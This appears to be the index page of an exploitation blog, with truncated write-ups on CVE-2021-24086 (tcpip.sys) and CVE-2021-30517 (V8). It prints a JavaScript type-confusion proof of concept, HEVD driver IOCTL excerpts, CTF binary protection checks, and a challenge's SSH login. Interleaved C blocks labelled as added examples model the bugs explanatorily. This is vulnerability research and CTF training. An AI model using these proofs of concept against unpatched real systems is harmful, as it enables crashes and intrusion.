ret2ver
CVE-2021-24086: Null pointer dereference in TCPIP
Created 2021-12-23 | Pwn, Windows, Kernel, TCPIP, CVE

Information gathering

The patch is in the Ipv6pReassembleDatagram function of tcpip.sys. It constrains one variable so that its value cannot exceed 0xffff, and the second argument, BytesNeeded, passed to the NdisGetDataBuffer call just below is no longer truncated to two bytes. Intuitively this looks like a check on a length, but where that length comes from needs further analysis.

Using the public PoC, change the interface:

```python
parser.add_argument('--iface', default = "VMware Network Adapter VMnet8")
```

Then run it. The target crashes, with the following crash information:

...
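The two-byte truncation that the patch removes, modelled as an added C example (this is not code from tcpip.sys, from the patch, or from the PoC; the frag_t type, the function names and the fragment sizes are hypothetical, constructed for illustration): a 32-bit reassembled total passed through a 16-bit count loses its high bits, so a datagram of 0x10010 bytes looks like 0x10 bytes to the callee, whereas the checked version rejects anything above 0xffff before the count is used.

```c
/* Added example: model of a 16-bit length truncation on a reassembled
 * datagram. Not tcpip.sys code; frag_t, reassemble_total_len,
 * bytes_needed_truncated and bytes_needed_checked are hypothetical names. */
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include <stdio.h>

typedef struct { uint32_t payload_len; } frag_t;   /* one received fragment */

/* Sum the payload lengths of all fragments of one datagram (32-bit total). */
static uint32_t reassemble_total_len(const frag_t *frags, size_t n) {
    uint32_t total = 0;
    for (size_t i = 0; i < n; i++) total += frags[i].payload_len;
    return total;
}

/* Pre-patch behaviour (model): the 32-bit total is passed through a 16-bit
 * parameter, so 0x10010 silently becomes 0x0010 and the caller believes far
 * fewer bytes are needed than were actually reassembled. */
static uint16_t bytes_needed_truncated(uint32_t total) {
    return (uint16_t)total;
}

/* Patched behaviour (model of the check described in the write-up): refuse
 * any total above 0xffff and keep the full width of the count. */
static bool bytes_needed_checked(uint32_t total, uint32_t *out) {
    if (total > 0xffff) return false;
    *out = total;
    return true;
}

int main(void) {
    /* Constructed input: two fragments whose sizes sum past 0xffff. */
    frag_t frags[] = { { 0x8000 }, { 0x8010 } };
    uint32_t total = reassemble_total_len(frags, 2);
    uint32_t checked = 0;
    printf("total=0x%x truncated=0x%x accepted=%d\n",
           total, bytes_needed_truncated(total),
           bytes_needed_checked(total, &checked));
    return 0;
}
```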
CVE-2021-30517: Type confusion in V8 IC
Created 2021-12-21 | Pwn, Browser, V8, CVE, Inline Cache

Information gathering

The issue corresponding to this CVE is Issue 1203122; it is a type confusion bug. A PoC is also helpfully provided:

```javascript
function main() {
  class C {
    m() {
      super.prototype
    }
  }
  function f() {}
  C.prototype.__proto__ = f
  let c = new C()
  c.x0 = 1
  c.x1 = 1
  c.x2 = 1
  c.x3 = 1
  c.x4 = 0x42424242 / 2
  f.prototype
  c.m()
}
for (let i = 0; i < 0x100; ++i) {
  main()
}
```

An exploit is also given:

...
HEVD - Arbitrary Write
Created 2021-10-28

Source

HackSysExtremeVulnerableDriver.h:

```c
//
// IOCTL Definitions
//
#define HEVD_IOCTL_ARBITRARY_WRITE IOCTL(0x802)
```

HackSysExtremeVulnerableDriver.c:

```c
/// <summary>
/// IRP Device IoCtl Handler
/// </summary>
/// <param name="DeviceObject">The pointer to DEVICE_OBJECT</param>
/// <param name="Irp">The pointer to IRP</param>
```

...
HEVD - Buffer Overflow Stack
Created 2021-10-27

Source

HackSysExtremeVulnerableDriver.h:

```c
//
// IOCTL Definitions
//
#define HEVD_IOCTL_BUFFER_OVERFLOW_STACK IOCTL(0x800)
```

HackSysExtremeVulnerableDriver.c:

```c
/// <summary>
/// IRP Device IoCtl Handler
/// </summary>
/// <param name="DeviceObject">The pointer to DEVICE_OBJECT</param>
/// <param name="Irp">The pointer to IRP</param>
```

...
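The HEVD_IOCTL_* defines in both HEVD write-ups above expand to a control code through an IOCTL() helper that the excerpts do not show. The following is an added example, not HEVD's own source: it assumes the helper is CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS) and reproduces the Windows CTL_CODE bit layout (DeviceType << 16 | Access << 14 | Function << 2 | Method) so the numeric codes sent with DeviceIoControl can be computed and decoded without the DDK headers. decode_ioctl and ioctl_parts_t are names chosen here.

```c
/* Added example (not HEVD code): build and decode Windows IOCTL control
 * codes for the HEVD_IOCTL_* functions quoted above. The IOCTL() helper is
 * an assumption about HEVD's header; the CTL_CODE layout is the standard one. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define FILE_DEVICE_UNKNOWN 0x22
#define METHOD_BUFFERED     0
#define METHOD_IN_DIRECT    1
#define METHOD_OUT_DIRECT   2
#define METHOD_NEITHER      3
#define FILE_ANY_ACCESS     0

/* Standard Windows CTL_CODE layout. */
#define CTL_CODE(DeviceType, Function, Method, Access) \
    ((uint32_t)(((DeviceType) << 16) | ((Access) << 14) | ((Function) << 2) | (Method)))

/* Assumed definition of HEVD's IOCTL() helper macro. */
#define IOCTL(Function) \
    CTL_CODE(FILE_DEVICE_UNKNOWN, Function, METHOD_NEITHER, FILE_ANY_ACCESS)

#define HEVD_IOCTL_BUFFER_OVERFLOW_STACK IOCTL(0x800)
#define HEVD_IOCTL_ARBITRARY_WRITE       IOCTL(0x802)

typedef struct {
    uint32_t device_type;   /* bits 31..16 */
    uint32_t access;        /* bits 15..14 */
    uint32_t function;      /* bits 13..2  */
    uint32_t method;        /* bits 1..0   */
} ioctl_parts_t;

/* Split a 32-bit control code back into its four fields. */
static ioctl_parts_t decode_ioctl(uint32_t code) {
    ioctl_parts_t p;
    p.device_type = (code >> 16) & 0xffff;
    p.access      = (code >> 14) & 0x3;
    p.function    = (code >> 2)  & 0xfff;
    p.method      = code & 0x3;
    return p;
}

int main(void) {
    uint32_t codes[] = { HEVD_IOCTL_BUFFER_OVERFLOW_STACK, HEVD_IOCTL_ARBITRARY_WRITE };
    for (size_t i = 0; i < sizeof codes / sizeof codes[0]; i++) {
        ioctl_parts_t p = decode_ioctl(codes[i]);
        printf("0x%08x -> device 0x%x function 0x%x method %u access %u\n",
               codes[i], p.device_type, p.function, p.method, p.access);
    }
    return 0;
}
```

With these assumptions the two codes come out as 0x222003 and 0x22200b. The method field of 3 (METHOD_NEITHER) is what makes the I/O manager hand the driver the caller's raw user-mode buffer pointers rather than a system-buffer copy, so every length and pointer the IRP handler reads from them is attacker-controlled.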
2019OGeek - babyheap
Created 2021-10-07

Protection checks

```
Results for: .\babyheap.exe
Dynamic Base    : "Present"
ASLR            : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation       : "Present"
NX              : "Present"
SEH             : "Present"
CFG             : "NotPresent"
RFG             : "NotPresent"
SafeSEH         : "NotPresent"
GS              : "Present"
Authenticode    : "NotP ...
```
2017HITB GSEC - babyshellcode
Created 2021-10-05

Protection checks

```
Results for: .\babyshellcode.exe
Dynamic Base    : "Present"
ASLR            : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation       : "Present"
NX              : "Present"
SEH             : "Present"
CFG             : "Present"
RFG             : "NotPresent"
SafeSEH         : "NotPresent"
GS              : "Present"
Authenticode    : "No ...
```
2017Insomnihack - easywin
Created 2021-10-04

Protection checks

```
Results for: .\easywin.exe
Dynamic Base    : "Present"
ASLR            : "Present"
High Entropy VA : "Present"
Force Integrity : "NotPresent"
Isolation       : "Present"
NX              : "Present"
SEH             : "Present"
CFG             : "Present"
RFG             : "NotPresent"
SafeSEH         : "NotApplicable"
GS              : "Present"
Authenticode    : "NotPrese ...
```
2017HITB GSEC - babystack
Created 2021-10-03

Protection checks

```
Results for: .\babystack.exe
Dynamic Base    : "Present"
ASLR            : "Present"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation       : "Present"
NX              : "Present"
SEH             : "Present"
CFG             : "Present"
RFG             : "NotPresent"
SafeSEH         : "NotPresent"
GS              : "Present"
Authenticode    : "NotPre ...
```
2020 QWB CTF (强网杯) - easyoverflow
Created 2021-10-02

Protection checks

```
Results for: .\StackOverflow.exe
Dynamic Base    : "Present"
ASLR            : "Present"
High Entropy VA : "Present"
Force Integrity : "NotPresent"
Isolation       : "Present"
NX              : "Present"
SEH             : "Present"
CFG             : "NotPresent"
RFG             : "NotPresent"
SafeSEH         : "NotApplicable"
GS              : "Present"
Authenticode    : " ...
```
PE32 - Advanced stack buffer overflow
Created 2021-10-01

Service interaction

SSH connection:

```shell
ssh -p 2225 app-systeme-ch73@challenge05.root-me.org
app-systeme-ch73
```

Download the file with SCP:

```shell
scp -r app-systeme-ch73@challenge05.root-me.org:/challenge/app-systeme/ch73/ch73.exe ./
```

Challenge analysis

First check the protections:

```
Results for: .\ch73.exe
Dynamic Base    : "NotPresent"
ASLR            : "NotPresent"
High Entropy VA : "NotPresent"
Force Integrity : "NotPresent"
Isolation       : "Present"
NX              : "NotPresent"
SEH             : "Present ...
```
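Several rows of the protection-check output used throughout the Windows pwn write-ups above (Dynamic Base, High Entropy VA, Force Integrity, NX, SEH, Isolation, CFG) come straight from the DllCharacteristics field of the PE optional header. The following is an added example, not the tool the author ran nor code from any of the write-ups: it walks a PE image from the DOS header to the optional header with bounds checks and decodes that field into the same yes/no answers. The image it parses is a constructed minimal header, not a real binary, and pe_read_mitigations, build_sample_pe and pe_mitigations_t are names chosen here. Rows such as ASLR, SafeSEH, GS, RFG and Authenticode depend on relocations, the load config directory and the certificate table, which this example deliberately does not cover.

```c
/* Added example: decode IMAGE_OPTIONAL_HEADER.DllCharacteristics into the
 * mitigation rows seen in the write-ups' protection checks. Not the checking
 * tool's code; the sample image below is constructed, not a real executable. */
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
#include <string.h>
#include <stdio.h>

/* DllCharacteristics bits as defined in the PE specification. */
#define DLLCHAR_HIGH_ENTROPY_VA 0x0020
#define DLLCHAR_DYNAMIC_BASE    0x0040
#define DLLCHAR_FORCE_INTEGRITY 0x0080
#define DLLCHAR_NX_COMPAT       0x0100
#define DLLCHAR_NO_ISOLATION    0x0200
#define DLLCHAR_NO_SEH          0x0400
#define DLLCHAR_GUARD_CF        0x4000

typedef struct {
    uint16_t magic;               /* 0x10b = PE32, 0x20b = PE32+ */
    uint16_t dll_characteristics; /* raw field */
    bool dynamic_base, high_entropy_va, force_integrity, nx, seh, isolation, cfg;
} pe_mitigations_t;

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* DOS header -> PE signature -> COFF header -> optional header, every offset
 * checked against len so a truncated or hostile image cannot read past it. */
static bool pe_read_mitigations(const uint8_t *img, size_t len, pe_mitigations_t *out) {
    if (len < 0x40 || img[0] != 'M' || img[1] != 'Z') return false;
    uint32_t pe_off = rd32(img + 0x3c);                 /* e_lfanew */
    /* need signature(4) + COFF header(20) + at least 72 bytes of optional header */
    if (pe_off > len || len - pe_off < 4 + 20 + 72) return false;
    if (memcmp(img + pe_off, "PE\0\0", 4) != 0) return false;
    const uint8_t *coff = img + pe_off + 4;
    if (rd16(coff + 16) < 72) return false;             /* SizeOfOptionalHeader */
    const uint8_t *opt = coff + 20;
    uint16_t magic = rd16(opt);
    if (magic != 0x10b && magic != 0x20b) return false;
    uint16_t dc = rd16(opt + 70);   /* DllCharacteristics: same offset in PE32 and PE32+ */
    out->magic = magic;
    out->dll_characteristics = dc;
    out->dynamic_base    = (dc & DLLCHAR_DYNAMIC_BASE) != 0;
    out->high_entropy_va = (dc & DLLCHAR_HIGH_ENTROPY_VA) != 0;
    out->force_integrity = (dc & DLLCHAR_FORCE_INTEGRITY) != 0;
    out->nx              = (dc & DLLCHAR_NX_COMPAT) != 0;
    out->seh             = (dc & DLLCHAR_NO_SEH) == 0;       /* "SEH: Present" = NO_SEH clear */
    out->isolation       = (dc & DLLCHAR_NO_ISOLATION) == 0; /* likewise for NO_ISOLATION */
    out->cfg             = (dc & DLLCHAR_GUARD_CF) != 0;
    return true;
}

/* Constructed sample: 0x100-byte image with "MZ", e_lfanew = 0x40, "PE\0\0",
 * a 20-byte COFF header and a PE32 optional header carrying the given flags. */
static size_t build_sample_pe(uint8_t *buf, size_t len, uint16_t dll_characteristics) {
    if (len < 0x100) return 0;
    memset(buf, 0, 0x100);
    buf[0] = 'M'; buf[1] = 'Z';
    buf[0x3c] = 0x40;                                   /* e_lfanew */
    memcpy(buf + 0x40, "PE\0\0", 4);
    uint8_t *coff = buf + 0x44;
    coff[16] = 0xe0;                                    /* SizeOfOptionalHeader for PE32 */
    uint8_t *opt = coff + 20;
    opt[0] = 0x0b; opt[1] = 0x01;                       /* magic 0x10b */
    opt[70] = (uint8_t)(dll_characteristics & 0xff);
    opt[71] = (uint8_t)(dll_characteristics >> 8);
    return 0x100;
}

static void print_report(const char *name, const pe_mitigations_t *m) {
    const char *p = "\"Present\"", *n = "\"NotPresent\"";
    printf("Results for: %s\n", name);
    printf("Dynamic Base    : %s\n", m->dynamic_base ? p : n);
    printf("High Entropy VA : %s\n", m->high_entropy_va ? p : n);
    printf("Force Integrity : %s\n", m->force_integrity ? p : n);
    printf("Isolation       : %s\n", m->isolation ? p : n);
    printf("NX              : %s\n", m->nx ? p : n);
    printf("SEH             : %s\n", m->seh ? p : n);
    printf("CFG             : %s\n", m->cfg ? p : n);
}

int main(void) {
    uint8_t img[0x100];
    pe_mitigations_t m;
    /* hardened-looking sample, then one with nothing set (like ch73.exe above) */
    build_sample_pe(img, sizeof img, DLLCHAR_DYNAMIC_BASE | DLLCHAR_HIGH_ENTROPY_VA |
                                     DLLCHAR_NX_COMPAT | DLLCHAR_GUARD_CF);
    if (pe_read_mitigations(img, sizeof img, &m)) print_report("sample_hardened.exe", &m);
    build_sample_pe(img, sizeof img, 0);
    if (pe_read_mitigations(img, sizeof img, &m)) print_report("sample_plain.exe", &m);
    return 0;
}
```

Note the inverted sense of the SEH and Isolation rows: the PE flags are NO_SEH and NO_ISOLATION, so "Present" in the tool output corresponds to the bit being clear.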
Vergissmeinnicht
Live Long And Pwn.

©2020 - 2022 By Vergissmeinnicht
Framework Hexo | Theme Butterfly